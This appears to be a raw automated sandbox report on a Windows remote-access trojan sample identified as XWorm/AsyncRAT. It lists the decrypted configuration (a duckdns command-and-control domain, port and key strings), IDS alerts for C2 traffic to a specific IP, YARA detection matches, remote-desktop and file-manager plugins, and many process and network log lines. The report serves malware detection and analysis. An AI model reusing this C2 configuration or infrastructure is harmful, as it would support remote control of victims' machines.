Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
String decryptor: nmds.duckdns.org |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
String decryptor: 8895 |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
String decryptor: <123456789> |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
String decryptor: <Xwormmm> |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
String decryptor: USB.exe |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then jmp 00007FFD9B88CE39h |
0_2_00007FFD9B88C7F9 |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then jmp 00007FFD9B88CE4Ah |
0_2_00007FFD9B88C7F9 |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then dec eax |
0_2_00007FFD9B890F61 |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then jmp 00007FFD9B88F991h |
0_2_00007FFD9B88D28D |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then jmp 00007FFD9B88FCADh |
0_2_00007FFD9B88D28D |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then mov eax, dword ptr [ebp-44h] |
0_2_00007FFD9B88D28D |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then jmp 00007FFD9B893382h |
0_2_00007FFD9B8931EC |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then jmp 00007FFD9B88C222h |
0_2_00007FFD9B88C09F |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then dec eax |
0_2_00007FFD9B8911B9 |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then dec eax |
0_2_00007FFD9B8910FA |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then dec eax |
0_2_00007FFD9B891155 |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 4x nop then dec eax |
0_2_00007FFD9B891093 |
Source: Traffic |
Snort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.4:49730 -> 87.121.105.4:8895 |
Source: Traffic |
Snort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 87.121.105.4:8895 -> 192.168.2.4:49730 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 87.121.105.4:8895 -> 192.168.2.4:49746 |
Source: Traffic |
Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49746 -> 87.121.105.4:8895 |
Source: Traffic |
Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49746 -> 87.121.105.4:8895 |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 87.121.105.4:8895 -> 192.168.2.4:49730 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 87.121.105.4:8895 -> 192.168.2.4:49730 |
Source: Traffic |
Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49750 -> 87.121.105.4:8895 |
Source: Traffic |
Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49750 -> 87.121.105.4:8895 |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 87.121.105.4:8895 |
Source: Traffic |
Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 87.121.105.4:8895 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 104.46.162.224 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 173.222.162.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.56.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.114.59.183 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.199.71.185 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.199.71.184 |
Source: global traffic |
HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic |
HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePH36pyBPCcPnFr&MD=c6hfexxl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: global traffic |
HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePH36pyBPCcPnFr&MD=c6hfexxl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: chromecache_51.4.dr |
String found in binary or memory: http://www.broofa.com |
Source: chromecache_56.4.dr |
String found in binary or memory: https://accounts.google.com/o/oauth2/auth |
Source: chromecache_56.4.dr |
String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay |
Source: chromecache_56.4.dr, chromecache_51.4.dr |
String found in binary or memory: https://apis.google.com |
Source: chromecache_56.4.dr |
String found in binary or memory: https://clients6.google.com |
Source: chromecache_56.4.dr |
String found in binary or memory: https://content.googleapis.com |
Source: chromecache_56.4.dr |
String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/ |
Source: chromecache_56.4.dr |
String found in binary or memory: https://domains.google.com/suggest/flow |
Source: chromecache_51.4.dr |
String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3 |
Source: chromecache_51.4.dr |
String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3 |
Source: chromecache_51.4.dr |
String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2 |
Source: chromecache_51.4.dr |
String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2 |
Source: chromecache_51.4.dr |
String found in binary or memory: https://play.google.com/log?format=json&hasfast=true |
Source: chromecache_56.4.dr |
String found in binary or memory: https://plus.google.com |
Source: chromecache_56.4.dr |
String found in binary or memory: https://plus.googleapis.com |
Source: chromecache_56.4.dr |
String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1 |
Source: chromecache_56.4.dr |
String found in binary or memory: https://www.googleapis.com/auth/plus.me |
Source: chromecache_56.4.dr |
String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended |
Source: chromecache_51.4.dr |
String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html |
Source: chromecache_51.4.dr |
String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css |
Source: chromecache_51.4.dr |
String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css |
Source: unknown |
Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49761 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49678 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49760 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49760 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49756 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49675 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49761 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49756 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 0_2_00007FFD9B88D28D |
0_2_00007FFD9B88D28D |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 0_2_00007FFD9B887282 |
0_2_00007FFD9B887282 |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 0_2_00007FFD9B88A99E |
0_2_00007FFD9B88A99E |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 0_2_00007FFD9B88946D |
0_2_00007FFD9B88946D |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Code function: 0_2_00007FFD9B8864D6 |
0_2_00007FFD9B8864D6 |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameXwrm3.1.exe4 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4097692510.000000001BD80000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameFileManager.dll8 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4099447326.000000001C090000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Binary or memory string: OriginalFilenameXwrm3.1.exe4 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, AlgorithmAES.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1bd80000.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1bd80000.1.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1c090000.2.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1c090000.2.raw.unpack, Helper.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: unknown |
Process created: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe "C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe" |
|
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// |
|
Source: unknown |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/ |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2496,i,13517212685356134340,2370661816050994569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1124 --field-trial-handle=2028,i,13329251012211762179,12573226295212013179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
|
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2496,i,13517212685356134340,2370661816050994569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe |
Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1124 --field-trial-handle=2028,i,13329251012211762179,12573226295212013179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe |
Section loaded: windows.storage.dll |
